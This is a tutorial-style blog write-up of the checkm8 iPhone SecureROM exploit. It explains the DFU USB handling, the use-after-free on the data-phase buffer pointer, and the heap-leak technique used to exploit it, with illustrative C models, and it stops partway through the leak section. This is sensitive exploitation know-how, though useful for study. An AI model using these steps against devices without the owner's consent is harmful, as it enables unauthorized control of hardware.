About the checkm8 exploit

I will try to explain what I could understand of the checkm8 exploit and reproduce it.

This subject is kind of outdated by now, as probably everyone already knows how it works, but well, I do not, so I thought it would be interesting to give it a try!

I am not lying, it just… looked scary. All of this was, and still is, too much for a beginner in vulnerabilities like me… but today I am moving out of my comfort zone and I will try to understand it! (๑•̀ㅂ•́)و✧

At first I didn’t want to publish it, since I noticed after finishing this article that some write-ups already existed and were somehow much better than mine (I even thought at first that I had copied some, which was not the case ;-;), but after all I’ve done, I had to publish it.

Some things may be wrong, as I tried to understand everything by myself without asking for much help, so please correct me if I ever say something wrong. This write-up was really written in order to educate myself so… here it is :’)

I hope that you will learn something new or at least will enjoy what I have been doing for the last few months!

Also, I will assume that you have a bit of knowledge of reverse-engineering, embedded programming, etc.

0x1. Basics

In 2019, @axi0mX published, out of nowhere, a SecureROM exploit whose vulnerability affects devices from the iPhone 4S (A5) to the iPhone X (A11).

This kind of exploit is very important because the bug lives in the SecureROM (Read Only Memory), so Apple can only fix it by releasing new devices, and exploiting it gives us the highest privileges possible (EL3).

As said, this exploit targets the SecureROM, which is the very first component of the bootchain to start (you can read a bit about the bootchain here).

Here is a quick view of the bootchain process:

The checkm8 exploit therefore occurs at the very beginning of this sequence, when DFU mode is triggered, and what I am going to do today is try to reproduce the exploit on my own!

Also, it is thanks to this exploit that amazing projects could see the light, such as:

checkra1n jailbreak,
project sandcastle (which allows us to boot Linux/Android!),
Bonobo cables (allowing CPU debugging through JTAG/SWD),
checkm8_bootkit (allowing you to boot arbitrary iBoot images),
[…]

And since then, multiple forks of ipwndfu have also seen the light, either for other devices or using alternative ways, such as:

checkwatch (targeting the Apple Watches)
checkm8-haywire (targeting Apple’s haywire)
ra1npoc (allowing you to use checkm8 from an already jailbroken device)
[…]

Anyways, enough talking: let’s see how it works! (^∀^)

0x2. Apollo

Shortly after the release of checkm8, @littlelailo published a gist about an Apple BootROM bug which appeared to be the same bug as checkm8.

The interesting thing is that it only contains a short explanation of the exploitation, without that many details and with no big chunks of code (nor any tool) provided, making that gist great training for today: I will try to understand the bug only by following this kind of guide.

Let’s get into it :)

0x21. Step 1 (Starting)

1: “When usb is started to get an image over dfu, dfu registers an interface to handle all the commands and allocates a buffer for input and output”

DFU is a mode in which you should be able to restore your device from any state (it is also a part of the SecureROM).

From what I understood, when you enter DFU mode, a certain function called usb_init_with_controller(...) is called to init the USB Stack so it can communicate with a host in order to receive an image and exit this “emergency” state.

In this context, the function usb_core_init(…) is invoked, and it is the one indirectly referenced in the previous statement.

Globally, the purpose of this function is to register a new DFU interface that will perform all of the required state management and communication with the connected host, in the hope of receiving a new firmware.

The buffer mentioned here is a global variable of the Interface Code called io_buffer, which is allocated by the memalign(3) function. Its purpose is to temporarily store the received data.

Then, the function continues by registering an interface (which is the communication channel between the device and the computer) that will handle all USB transfers/transactions/[…] thanks to a structure called usb_interface_instance (which is also a global structure):

The pseudo-code you are currently viewing was taken from an A7 SecureROM, you can pick it up here (but I mostly used the iBoot source code)

Once this function has been successfully executed, the process continues until completion, and the device is officially placed in the DFU state, allowing us to proceed to the next step.

Please keep the fields of the usb_interface_instance structure in mind, they will be useful and explained later.

0x22. Step 2 (USB)

2: “if you send data to dfu the setup packet is handled by the main code which then calls out to the interface code”

For this step, please take a seat because this is going to be a long one.

This part will actually cover the USB basics and some other things related to the Interface / Main code.

0x221. Basics

Actually, I had basically no knowledge about all of this USB stuff, that’s why I will try to detail what I understood (please correct me if I’m wrong).

One thing you need to know is that DFU mode accepts something called “control transfers”: these transfers are typically initiated by the host to perform various operations on the device and work in “phases” (SETUP, then an optional DATA phase, then STATUS; you can read a more complete explanation here):

The host is the device that initiates and controls the communication, in short: that’s us

Technically, every USB device must have a sort of “default configuration” in order to answer when a SETUP packet is sent.

Also, a packet usually (no matter which phase it actually is) looks like this:

These are the main fields; plenty of other libraries can deal with control transfers (with different prototypes), but you get the idea

bmRequestType: a bit-field that indicates the direction of the request (host to device or the opposite), along with its type (standard, class or vendor) and its recipient (device, interface, endpoint, …),
bRequest: indicates what kind of control request we’ve sent, though its meaning mostly depends on the bmRequestType field (I will talk about it later),
wValue: a request-specific parameter passed from host to device, for example which USB descriptor to get/set or which device feature to configure,
wIndex: similar to wValue, except that this is the field used to pass the endpoint or interface number (as we are working with descriptors),
Data: a buffer that contains the data of the control request (input or output, depending on the specific request and its direction),
wLength: should match the size of the Data field and indicates how much data is transferred from the host to the device or the opposite.
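To make the layout concrete, here is a minimal sketch of the 8-byte SETUP packet as the USB 2.0 specification defines it (the Data buffer travels separately, in the DATA phase). The parse_setup helper is my own hypothetical name, not something taken from the SecureROM:

```c
#include <stdint.h>

/* The 8-byte SETUP packet as laid out by the USB 2.0 specification.
 * Multi-byte fields travel little-endian on the wire. */
struct usb_setup_packet {
    uint8_t  bmRequestType; /* direction, type and recipient bits */
    uint8_t  bRequest;      /* which request is being made */
    uint16_t wValue;        /* request-specific parameter */
    uint16_t wIndex;        /* request-specific index (interface, endpoint, ...) */
    uint16_t wLength;       /* number of bytes expected in the DATA phase */
};

/* parse_setup is a hypothetical helper: it decodes 8 raw bytes one by one,
 * so the result does not depend on host endianness or struct padding. */
static struct usb_setup_packet parse_setup(const uint8_t raw[8])
{
    struct usb_setup_packet p;
    p.bmRequestType = raw[0];
    p.bRequest      = raw[1];
    p.wValue        = (uint16_t)(raw[2] | (raw[3] << 8));
    p.wIndex        = (uint16_t)(raw[4] | (raw[5] << 8));
    p.wLength       = (uint16_t)(raw[6] | (raw[7] << 8));
    return p;
}
```

For instance, the bytes 21 01 00 00 00 00 00 08 decode to bmRequestType 0x21, bRequest 0x1 and wLength 0x800.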

0x222. Endpoints

If you read what I’ve written carefully, you may have noticed something called the “endpoint”:

From what I understood, the endpoint is a specific address within a USB device where data is sent/received. It can hold a buffer but also defines the type of data and transfer specificities (control, bulk, interrupt or isochronous) that can be transferred using it.

Every device must have an “endpoint at the address 0x0” (also known as EP0).

The purpose of EP0 is that you can send AND receive data within a single transfer, but also (and more importantly) that it is reserved for all control transfers, which gives the host the ability to read the device descriptor tables (corresponding to the setup part previously done in order to enter DFU mode) and to send control commands to the device during normal application execution.
For example, EP0 is used to indicate the end of a packet transfer, which is important for the proper functioning of USB communication protocol processes.

Phew, that was something… and we’re absolutely not done yet ٭(•﹏•)٭

0x223. Standard Interface Requests

As you saw previously, there’s a field called bmRequestType and another called bRequest, and these are vital in a control transfer.

I was looking at the iBoot source code and found an interesting comment about that:

And so, here we go: welcome to Yui’s class, please take a seat:

The content that you’re about to see is called the Standard Interface Requests. Their names are specific to the DFU interface, but they are basically used to configure and control the behavior of the current interface within the USB device (here, the DFU one).

Actually, there are two bmRequestType values (and plenty of bRequest for each of them):

DEVICE2HOST (its value is 0xA1) and its available bRequest are:
- DFU_GETSTATUS (0x3): allows the host (that’s us) to get the device’s status,
- DFU_GETSTATE (0x5): same idea, except that instead of the status, we get the device’s current state.

HOST2DEVICE (its value is 0x21) and its available bRequest are:
- DFU_DNLOAD (0x1): allows data transfers from the host (that’s still us) to the device,
- DFU_CLR_STATUS (0x4): clears the status and exits DFU mode,
- DFU_ABORT (0x6): same as DFU_CLR_STATUS.

Here, the DFU_CLR_STATUS and DFU_ABORT requests behave the same, even though the names are different.
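As a memo, the two lists above can be written down as a small lookup. This is only a sketch built from the values listed in this article; dfu_request_name is a hypothetical helper of mine, not a SecureROM function:

```c
#include <stdint.h>
#include <stddef.h>

#define DFU_DEVICE2HOST 0xA1
#define DFU_HOST2DEVICE 0x21

enum dfu_request {
    DFU_DNLOAD     = 0x1,
    DFU_GETSTATUS  = 0x3,
    DFU_CLR_STATUS = 0x4,
    DFU_GETSTATE   = 0x5,
    DFU_ABORT      = 0x6
};

/* Returns the request name for a (bmRequestType, bRequest) pair from the
 * lists above, or NULL when the pair is not one of them. */
static const char *dfu_request_name(uint8_t bmRequestType, uint8_t bRequest)
{
    if (bmRequestType == DFU_DEVICE2HOST) {
        switch (bRequest) {
        case DFU_GETSTATUS: return "DFU_GETSTATUS";
        case DFU_GETSTATE:  return "DFU_GETSTATE";
        default:            break;
        }
    } else if (bmRequestType == DFU_HOST2DEVICE) {
        switch (bRequest) {
        case DFU_DNLOAD:     return "DFU_DNLOAD";
        case DFU_CLR_STATUS: return "DFU_CLR_STATUS";
        case DFU_ABORT:      return "DFU_ABORT";
        default:             break;
        }
    }
    return NULL;
}
```

Note how the same bRequest value is only meaningful together with the right bmRequestType: 0x1 is DFU_DNLOAD under 0x21 but nothing under 0xA1.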

0x224. Standard Device Requests

In addition to the requests mentioned earlier, there’s also something called Standard Device Requests, which are used for device enumeration/configuration/… and any other control transfers that apply to the entire device: they are essential for the overall functionality of the device and provide a standard way for the host to communicate with and configure it.

So, there are, again, two bmRequestType values (and still plenty of bRequest):

DEVICE2HOST (its value is 0x80) and its available bRequest are:
- USB_REQ_GET_STATUS (0x0): allows us to get the status of the device,
- USB_REQ_GET_DESCRIPTOR (0x6): allows us to request a descriptor that can provide information (such as the device configuration, interfaces, endpoints, …),
- USB_REQ_GET_CONFIGURATION (0x8): allows us to get the current device configuration (how the device operates, which interfaces are active, …),
- USB_REQ_GET_INTERFACE (0xA): allows us to get the current interface setting (such as: which alternate setting is active, …).

HOST2DEVICE (its value is 0x00) and its available bRequest are:
- USB_REQ_CLEAR_FEATURE (0x1): allows us to clear a specific feature of the device,
- USB_REQ_SET_FEATURE (0x3): allows us to set a specific feature of the device,
- USB_REQ_SET_ADDRESS (0x5): allows us to set the USB address of the device (afterwards, communication between the device and the host uses this address),
- USB_REQ_SET_CONFIGURATION (0x9): allows us to set the device configuration,
- USB_REQ_SET_INTERFACE (0xB): allows us to set the device interface.

Note that the HOST2DEVICE bRequest are not explained in much detail since they’re pretty much the counterparts of the DEVICE2HOST ones.

Well, whether it’s configuring or managing the device, Standard Interface Requests and Standard Device Requests play different roles, which in the end eases the communication/control/… between the device and the host (I thought it was important to mention this since many USB requests use these parameters, though I agree it can be a bit confusing-).
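The four bmRequestType values we just met (0xA1, 0x21, 0x80, 0x00) are not magic numbers: per the USB 2.0 specification, bit 7 is the direction, bits 6..5 the type and bits 4..0 the recipient. A small sketch to decode them (the enum and function names are mine):

```c
#include <stdint.h>

enum usb_direction { USB_HOST_TO_DEVICE = 0, USB_DEVICE_TO_HOST = 1 };
enum usb_req_type  { USB_TYPE_STANDARD = 0, USB_TYPE_CLASS = 1, USB_TYPE_VENDOR = 2 };
enum usb_recipient { USB_RECIP_DEVICE = 0, USB_RECIP_INTERFACE = 1,
                     USB_RECIP_ENDPOINT = 2, USB_RECIP_OTHER = 3 };

/* Bit 7: transfer direction. */
static int req_direction(uint8_t bmRequestType) { return (bmRequestType >> 7) & 0x1; }

/* Bits 6..5: standard, class or vendor request. */
static int req_type(uint8_t bmRequestType)      { return (bmRequestType >> 5) & 0x3; }

/* Bits 4..0: who the request is addressed to. */
static int req_recipient(uint8_t bmRequestType) { return bmRequestType & 0x1F; }
```

So 0xA1 reads as device-to-host / class / interface and 0x21 as host-to-device / class / interface (the DFU requests), while 0x80 and 0x00 are the standard requests addressed to the whole device.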

So now, you can also guess that when we talk about the main code, we are in fact talking about the USB Core, and when we talk about the interface code, we’re talking about the DFU’s USB part. This will be really useful for the next part.

We should be alright now. This was huge and complex but we made it, let’s move forward! (disclaimer: this is not the end-)

0x225. Packet Handling

ANYWAYS.

In this step, it’s mentioned that the packet is first handled by the main code, so that’s where we’ll look.

I will not lie, my first research went wrong because I looked at the Interface Code and not the Main Code (which was correct in the end but not entirely, I was really confused by everything, I must confess), but now that we’ve seen how to differentiate them, we can make things right!

So! In order to find the function that actually handles the packet, you have to dig pretty deep into the code (so I will not detail how far I searched), but the one I found is called usb_core_handle_usb_control_receive(...).

It seems that this function is the one that handles the SETUP packets (and will call another function called handle_ep0_data_phase(...) if the packet received is a DATA one), so the following pseudo-code is the one that will be executed when a SETUP packet is received:

The usb_dfu_interface_instance structure is the one we’ve talked about earlier (it contains the elements set when the DFU interface was registered, […]).

From what I understand, if the bmRequestType targets the interface and its direction is USB_REQ_HOST2DEVICE, then the function will call a member of usb_dfu_interface_instance: this member is a function pointer to handle_interface_request(...), which is an interface function (this is where we jump from the main code to the interface code).

This point leads us to the next part.

Also, if you’ve read carefully, you saw that once the usb_core_handle_usb_control_receive(...) function is done, it jumps to a label called success, which only signals that the DATA Phase can start, so it is not that interesting to show.
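Here is how I picture that jump from the main code to the interface code. It is a heavily simplified sketch of my own: the structure layout, core_handle_setup and the demo handler are assumptions for illustration, and only the host-to-device interface branch is modelled:

```c
#include <stdint.h>
#include <stddef.h>

struct usb_setup {
    uint8_t  bmRequestType;
    uint8_t  bRequest;
    uint16_t wValue, wIndex, wLength;
};

/* Hypothetical, trimmed-down registered interface: only the request
 * callback is kept. */
struct usb_interface {
    int (*handle_request)(const struct usb_setup *setup, uint8_t **out_buffer);
};

/* "Main code" state (names follow the article, the layout is assumed). */
static const struct usb_interface *registered_interface;
static uint8_t  *ep0_data_phase_buffer;
static uint32_t  ep0_data_phase_length;

/* Returns 0 when the DATA phase may start, -1 when EP0 should be stalled.
 * Requests other than host-to-device interface ones are not modelled. */
static int core_handle_setup(const struct usb_setup *setup)
{
    int is_interface = (setup->bmRequestType & 0x1F) == 0x01;
    int host_to_dev  = (setup->bmRequestType & 0x80) == 0;

    if (!is_interface || !host_to_dev || registered_interface == NULL)
        return -1;

    /* Jump from the main code into the interface code: the callback
     * updates the pointer we pass it and returns the expected length. */
    int len = registered_interface->handle_request(setup, &ep0_data_phase_buffer);
    if (len < 0)
        return -1;

    ep0_data_phase_length = (uint32_t)len;
    return 0;
}

/* Stand-in interface handler, only there to exercise the dispatcher. */
static uint8_t demo_buffer[0x800];

static int demo_handle_request(const struct usb_setup *setup, uint8_t **out_buffer)
{
    *out_buffer = demo_buffer;
    return setup->wLength;
}

static const struct usb_interface demo_interface = { demo_handle_request };
```

The important detail is that the main code owns ep0_data_phase_buffer and ep0_data_phase_length, while the interface code only fills them in through the pointer it receives.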

0x23. Step 3, 4, 5 (Update)

3, 4, 5: “the interface code verifies that wLength is shorter than the input output buffer length and if that’s the case it updates a pointer passed as an argument with a pointer to the input output buffer”

When the main code jumps to this interface function, the first thing I noticed was that this function handles the two interface bmRequestType values available and all of their bRequest.

However, in our case we are only interested in the HOST2DEVICE request, in particular the DFU_DNLOAD bRequest (which is the one that allows us to send data to the device; if you followed until here, I don’t think I need to explain why).

As the statement says, when the function enters the branch where the bRequest is equal to DFU_DNLOAD, it checks that wLength does not exceed the total allocated length of io_buffer (which is 0x800).

However, the pseudo-code shows the opposite case, where wLength is bigger than the io_buffer length, which makes DFU stall (the logic is still the same though).

That aside, the main point of this function is to update the ep0_data_phase_buffer pointer so that it holds the address of io_buffer, which is the buffer of the interface code that will be used for the DATA Phase and that contains the memory allocated for the received data (see usb_dfu_init(...)).

The function then returns wLength and jumps back to the main code (a.k.a usb_core_handle_usb_control_receive(...)).
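Reduced to the DFU_DNLOAD branch, the logic described above could look like the sketch below. dfu_handle_dnload and the static storage are my own simplifications (the real buffer is heap-allocated), so take it as an illustration rather than the actual SecureROM code:

```c
#include <stdint.h>
#include <stddef.h>

#define IO_BUFFER_SIZE  0x800
#define DFU_HOST2DEVICE 0x21
#define DFU_DNLOAD      0x1

/* Static storage stands in for the heap allocation done at DFU init. */
static uint8_t  io_buffer_storage[IO_BUFFER_SIZE];
static uint8_t *io_buffer = io_buffer_storage;

/* Returns the number of bytes expected in the DATA phase, or -1 when the
 * caller should stall. On success, *out_buffer is pointed at io_buffer. */
static int dfu_handle_dnload(uint8_t bmRequestType, uint8_t bRequest,
                             uint16_t wLength, uint8_t **out_buffer)
{
    if (bmRequestType != DFU_HOST2DEVICE || bRequest != DFU_DNLOAD)
        return -1;              /* other requests are not modelled here */

    if (wLength > IO_BUFFER_SIZE)
        return -1;              /* too big for io_buffer: stall */

    *out_buffer = io_buffer;    /* this is the pointer update of steps 3-5 */
    return wLength;
}
```

A wLength of exactly 0x800 is accepted, 0x801 is rejected and leaves the caller’s pointer untouched.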

We can now move on to the next part!

0x24. Step 6 (Buffer Filling)

6: “if a data package is recieved it gets written to the input output buffer via the pointer which was passed as an argument and another global variable is used to keep track of how many bytes were received already”

Then, here comes the DATA Phase, which is handled by the function handle_ep0_data_phase(...) (which is called by the function usb_core_handle_usb_control_receive(...)… again… phew~).

This function was a mess to disassemble and it was complicated to figure out what’s going on, just see for yourself…

Globally, this pseudo-code already speaks for itself, but as all those comments make it pretty messy, I will try to explain it in a more understandable way:

First, it checks whether adding the size of the data that just arrived to the amount previously received (ep0_data_phase_rcvd) exceeds the expected data phase length (ep0_data_phase_length).

If it does, the code stalls the EP0_IN endpoint (this endpoint is used for sending data from the USB Device to the host) and then clears the global variables.

Second, it uses the memcpy(...) function to copy the content of rx_buffer to ep0_data_phase_buffer (which is then updated to point to the next available position in the buffer, etc.) and states that the DATA Phase is still in progress.

Just a quick reminder to tell that rx_buffer has the io_buffer address

Finally, if either the entire expected data has been received or the received data doesn’t fill up a full packet (if we sent 0x26 out of 0x40 bytes, for example), it completes the data phase by checking whether there is a non-null callback function registered by the interface (which should be a function called data_received(...)).

If there is, it calls this function, which is the one we will talk about in the next part.
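The three steps above fit in a few lines once the hardware details are removed. This is my own model of them: the globals are grouped in a struct, the data_received(...) callback is replaced by a counter, and the NULL check at the top is an assumption:

```c
#include <stdint.h>
#include <string.h>

#define EP0_MAX_PACKET_SIZE 0x40

struct ep0_state {
    uint8_t  *buffer;     /* plays the role of ep0_data_phase_buffer */
    uint32_t  length;     /* ep0_data_phase_length */
    uint32_t  rcvd;       /* ep0_data_phase_rcvd */
    unsigned  completed;  /* counts where data_received(...) would be called */
};

/* Clears the tracking variables, like the end of a DATA phase does. */
static void ep0_reset(struct ep0_state *s)
{
    s->buffer = NULL;
    s->length = 0;
    s->rcvd   = 0;
}

/* Returns 1 while the DATA phase is still in progress, 0 once it is
 * complete, and -1 when the endpoint would be stalled. */
static int ep0_data_phase(struct ep0_state *s, const uint8_t *rx_buffer, uint32_t n)
{
    if (s->buffer == NULL)
        return -1;                      /* no DATA phase was set up */

    if (s->rcvd + n > s->length) {      /* more data than announced */
        ep0_reset(s);
        return -1;
    }

    memcpy(s->buffer, rx_buffer, n);    /* copy, then advance the cursor */
    s->buffer += n;
    s->rcvd   += n;

    /* Done when everything arrived or when a short packet was received. */
    if (s->rcvd == s->length || n != EP0_MAX_PACKET_SIZE) {
        s->completed++;
        ep0_reset(s);
        return 0;
    }
    return 1;
}
```

Notice that the tracking variables are only cleared on the two exit paths (stall or completion). A transfer that is set up but never finished leaves them as they are, which matters a lot later.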

0x25. Step 7 (Copy Buffer To Insecure Memory)

7: “if all the data was received the dfu specific code is called again and that then goes on to copy the contents of the input output buffer to the memory location from where the image is later booted”

We just talked about a non-null callback function called data_received(...) (which is called when the expected data has been received).

I will not detail everything but there is an interesting part in this screenshot: the security_allow_memory(...) function.

  
if (!(security_allow_memory(usb_dfu_interface_instance[...] + total_received, received) & 1))

From what I understand, this call checks that the destination range is allowed before the content of io_buffer is copied to the memory location mentioned in the statement (called INSECURE_MEMORY), from where the firmware (IMG4) is later booted, as DFU is supposed to be waiting for an image (so you can easily guess that it is a very sensitive zone).

If everything went well, it jumps back to the handle_ep0_data_phase(...) function, which sends a Zero-Length Packet (ZLP) and finally resets the global variables such as ep0_data_phase_length, ep0_data_phase_buffer, etc. (these are global state variables used to keep track of the DATA Phase).

Also, sending a ZLP is mandatory as it “prevents” issues that could arise from incomplete or unsynchronized data transfers.

0x26. Step 8, 9 (Done)

8, 9: if dfu exits the input output buffer is freed and if parsing of the image fails bootrom reenters dfu

Everything you’ve seen so far was originally executed from one function, getDFUImage(...): it is responsible for calling the right functions to wait for the DFU image and to handle the USB initialization/ending of DFU mode.

Only if the USB initialization is successful does DFU mode wait for the dfu_done variable to be set to true (which happens in the data_received() function, when a DFU_ABORT/DFU_CLR_STATUS packet is sent, or on a USB Reset), which makes it stop.

At this point of the explanation, we’ve reached the end of this function (assuming we’ve sent data so the io_buffer isn’t empty).

A function called usb_quiesce() calls several functions that stop the USB tasks, reset the USB controllers/descriptors, etc. In summary: it shuts down the USB Stack.

Keep in mind that among these shutdowns, the EP0_IN/EP0_OUT endpoints will also be aborted and stopped (thanks to a function called synopsys_otg_stop(void)).

One of these functions is called usb_dfu_exit(void), and it is responsible for resetting the interface which handled all commands (thanks to the bzero() function) and, if the io_buffer is not empty, freeing then NULLing it (because it is of no use any more, we wouldn’t want a Use-After-Free… right? :)).

The pseudo-code has been slightly messed up since the beginning, but I tried to make it as readable as possible using the iBoot source code

Then, it jumps back to the getDFUImage(...) function and, depending on the return value (called completion_status), DFU is either restarted/re-entered or the image is booted later (which is slightly out of scope at this point).
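The clean-up done by usb_dfu_exit can be sketched as follows. It is a simplified model of mine: malloc stands in for the aligned allocation mentioned earlier, memset for bzero(), and the interface structure is reduced to two hypothetical callbacks:

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define IO_BUFFER_SIZE 0x800

/* Reduced stand-in for the registered DFU interface. */
struct dfu_interface {
    int  (*handle_request)(void);
    void (*data_received)(void);
};

static struct dfu_interface usb_dfu_interface_instance;
static uint8_t *io_buffer;

/* Allocates the DATA phase buffer; returns 0 on success, -1 on failure. */
static int usb_dfu_init(void)
{
    io_buffer = malloc(IO_BUFFER_SIZE);   /* stand-in for the aligned alloc */
    return io_buffer != NULL ? 0 : -1;
}

/* Wipes the interface, then frees and NULLs io_buffer. Only the
 * interface-side pointer is cleared here: any copy of the address kept
 * elsewhere (for example by the main code) is left untouched. */
static void usb_dfu_exit(void)
{
    memset(&usb_dfu_interface_instance, 0, sizeof usb_dfu_interface_instance);

    if (io_buffer != NULL) {
        free(io_buffer);
        io_buffer = NULL;
    }
}
```

Calling usb_dfu_exit() twice in a row is harmless, since the pointer is NULL after the first call.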

We are now DONE with the explanation part, that was hard but well done for still being there!! (ﾉ◕ヮ◕)ﾉ*:･ﾟ

0x27. Summary

I admit, this is TOO MUCH information to process at once, so I will try to summarize everything we’ve seen so far.

About the global process of DFU mode, here’s a very abridged drawing of what we’ve seen:

I know that this is not an accurate drawing, but as the title says: it’s just a summary :)

And of course, I made another abridged drawing of the different requests we’ve seen:

Not that my memory is that limited, but I really don’t always remember everything, so I made this drawing to help me remember the request names and values

However, somewhere in this process lies a certain vulnerability, and this is what we will see in the next part.

0x3. Exploitation

And so, here we are: the exploitation part.

I was wondering “how in the world is it even possible to find a vulnerability in such a complex algorithm??” and to be really honest: I wouldn’t have been able to find it by myself.

0x31. Use-After-Free

As @littlelailo said:

At step 5 the global variables are updated and the bootrom gets ready to recieve 
the data, but with a cheap controller you can violate the usb spec and don't
send any (arduino host controller or sth like that).

Then you can trigger a usb reset to trigger image parsing. If that parsing fails
bootrom will enter dfu once again, BUT step 8 (code resets all variables and
goes on to handel new packages) wasn't executed so the global variables still
contain all the values.

However step 9 (when input output buffer is freed) was executed
so the input output buffer is freed while the pointer which was passed as an
argument in step 3 still points to it.

Because of that you can easily trigger a write to an already freed buffer by
sending data to the device.

What this text is saying is that, in this whole logic, a Use-After-Free occurs.

Why? Because the io_buffer is freed, but the pointer that points to it (ep0_data_phase_buffer, do you remember?) still holds its address.

Based on the summary drawing I made earlier, here’s what is supposed to happen:

This may be a little bit confusing, but it summarizes what @littlelailo said.

In other words:

Get into the DATA phase / to the point where the global variables are updated,
From there, send a DFU_ABORT/DFU_CLR_STATUS request or trigger a USB reset (which sets the dfu_done variable to true, stopping all DFU activities),
The usb_quiesce(...) function (that we previously saw) frees the io_buffer and shuts down the USB Stack, BUT the global variables (from the handle_ep0_data_phase(...) function) are not cleared as the transfer is not complete,
Then the getDFUImage(...) function we previously saw is re-executed, but the global variables are not reinitialized, leaving ep0_data_phase_buffer pointing to the previous io_buffer address, which is now freed.

ep0_data_phase_buffer = NULL: by NULLing the pointer, the code states that it will not reuse the current io_buffer pointer anymore, which is the right thing to do in order to prevent “undefined behaviors”…

However, as we skipped the “variables resetting” part, the pointer still points to the previous io_buffer memory location and, as we are dealing with a ROM (so highly, but not fully, predictable), there’s a high chance that the new io_buffer will get the same address on each new DFU iteration. That is what we don’t want, since the stale pointer would then simply point to the new, valid buffer and it would not be a UaF anymore.
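To convince myself, I modelled the sequence with fake addresses instead of real pointers (touching real freed memory would be undefined behavior, so this is only a toy model, and all the model_* names are mine):

```c
#include <stdint.h>

struct dfu_model {
    uint32_t io_buffer;              /* fake address of the current io_buffer, 0 = none */
    uint32_t ep0_data_phase_buffer;  /* fake address kept by the main code, 0 = NULL */
};

/* DFU (re)starts and allocates io_buffer at the given fake address. */
static void model_dfu_enter(struct dfu_model *m, uint32_t addr) { m->io_buffer = addr; }

/* A DFU_DNLOAD SETUP packet: the main code now points at io_buffer. */
static void model_setup_dnload(struct dfu_model *m) { m->ep0_data_phase_buffer = m->io_buffer; }

/* A completed DATA phase resets the tracking pointer. */
static void model_data_phase_done(struct dfu_model *m) { m->ep0_data_phase_buffer = 0; }

/* DFU exit frees io_buffer but does not touch the main code's pointer. */
static void model_dfu_exit(struct dfu_model *m) { m->io_buffer = 0; }

/* The main code's pointer is stale when it is set but no longer matches
 * the live io_buffer. */
static int model_is_dangling(const struct dfu_model *m)
{
    return m->ep0_data_phase_buffer != 0 && m->ep0_data_phase_buffer != m->io_buffer;
}
```

With a completed DATA phase, nothing dangles after the exit. With an interrupted one, the pointer is stale after the exit, but if the next iteration allocates io_buffer at the same fake address (say 0x1000 again), the model reports no dangling pointer anymore; only an allocation somewhere else (say 0x2000) keeps the stale pointer aimed at freed memory.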

This is amazing, but apparently not enough to exploit the vulnerability…（；へ：）

0x32. Memory Leak

But then, how could we exploit this vulnerability without the io_buffer having the same address?

Well, we need a work-around to prevent this from happening and, luckily, there’s apparently a way to do so: a Memory Leak (!!!) that will hopefully allow us to control the heap in order to finally get the io_buffer allocated further away from the former one’s address.

A Memory Leak occurs when a program allocates memory from the heap but fails to free it, leaving data allocated but no longer accessible.

This part will probably be the most complicated one, so please take a seat and let’s get into it!

I will not lie, I was kind of stuck there for a while, until I saw on Twitter some slides made by @qwertyoruiopz, which were very useful and which I really recommend taking a look at!

So I read it and I found the part that interested me:

In-flight USB transfers will have an associated structure allocated on the heap,

We have the ability to repeatedly malloc and delay the free temporarily,
until the IN endpoint of the device-to-host stall conditions are cleared
or the USB stack is shut down,

A state machine bug in the USB stack is abused in order to have allocations
that persist across USB stack destruction and creation.

(Memory Leak!!!)

SO, I will detail each point in order to understand what’s going on.

I had to search for that “associated structure” and I found one called usb_device_io_request, defined as follows:

  
struct usb_device_io_request
{
    u_int32_t                       endpoint;
    volatile u_int8_t               *io_buffer;
    int                             status;
    u_int32_t                       io_length;
    u_int32_t                       return_count;
    void (*callback)                (struct usb_device_io_request *io_request);
    struct usb_device_io_request    *next;
};

This structure can handle asynchronous operations thanks to the callback field (which is a function pointer that will be called once the request is completed), and the next field (which is a pointer to the next io_request structure in the linked list of requests, allowing a queue).

It is mentioned that stalling (or halting) the DEVICE2HOST IN endpoint is involved in this process, so I had to search for that.

The fact is that when you stall/halt the IN endpoint, you can still send requests but they will not be executed right away; instead, they are queued in the linked list until the IN endpoint is unstalled, with space being allocated on the heap for each request.

However, when the IN endpoint is unstalled, all of these requests are freed… so, doesn’t this give us the ability to allocate as much as we want and delay every free(...) of the objects on the heap-? (spoiler: YES!)
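Here is a small sketch of that “allocate now, free later” behavior, reusing the structure shown above with standard integer types. queue_request and complete_pending are hypothetical helpers of mine that only model the linked list, not the real USB stack:

```c
#include <stdint.h>
#include <stdlib.h>

struct usb_device_io_request {
    uint32_t          endpoint;
    volatile uint8_t *io_buffer;
    int               status;
    uint32_t          io_length;
    uint32_t          return_count;
    void (*callback)(struct usb_device_io_request *io_request);
    struct usb_device_io_request *next;
};

static struct usb_device_io_request *pending_head;
static struct usb_device_io_request *pending_tail;

/* Queues one request at the tail of the list. While the endpoint is
 * stalled nothing consumes the list, so each call keeps one more
 * allocation alive on the heap. Returns 0 on success, -1 on failure. */
static int queue_request(uint32_t endpoint, uint32_t io_length,
                         void (*callback)(struct usb_device_io_request *))
{
    struct usb_device_io_request *req = calloc(1, sizeof *req);
    if (req == NULL)
        return -1;

    req->endpoint  = endpoint;
    req->io_length = io_length;
    req->callback  = callback;

    if (pending_tail != NULL)
        pending_tail->next = req;
    else
        pending_head = req;
    pending_tail = req;
    return 0;
}

/* Models the endpoint being unstalled: every pending request completes,
 * its callback runs, and it is freed. Returns how many were freed. */
static unsigned complete_pending(int status)
{
    unsigned freed = 0;

    while (pending_head != NULL) {
        struct usb_device_io_request *req = pending_head;
        pending_head = req->next;
        req->status = status;
        if (req->callback != NULL)
            req->callback(req);
        free(req);
        freed++;
    }
    pending_tail = NULL;
    return freed;
}
```

Queue three requests while “stalled” and three allocations stay on the heap until complete_pending() runs, which is exactly the delay we are after.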

We somehow have a great attack vector, but sadly a slightly superficial one, because none of those allocations survive a shutdown of the USB Stack… that’s where the Memory Leak comes in!!

Finally, the “abused state machine bug in the USB stack” can be found right in the callback of the usb_device_io_request:

What this function basically does is add a ZLP to the execution queue only if the request is a Standard Device Request, has a length that is more than 0x0 and is an exact multiple of 0x40 (corresponding to EP0_MAX_PACKET_SIZE), and finally if the wLength global variable (what the host requested) is bigger than that length (completing the STATUS phase we have seen at the beginning… phew-).
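Written as a predicate, the condition described above looks like this. It is my reading of the callback, not a copy of it, and needs_zlp is a hypothetical name:

```c
#include <stdint.h>

#define EP0_MAX_PACKET_SIZE 0x40

/* Returns 1 when a completed request should be followed by a ZLP:
 * it is a Standard Device Request, it carried a non-zero length that is
 * an exact multiple of the EP0 packet size, and the host asked for more
 * bytes (host_wLength) than the request actually carried. */
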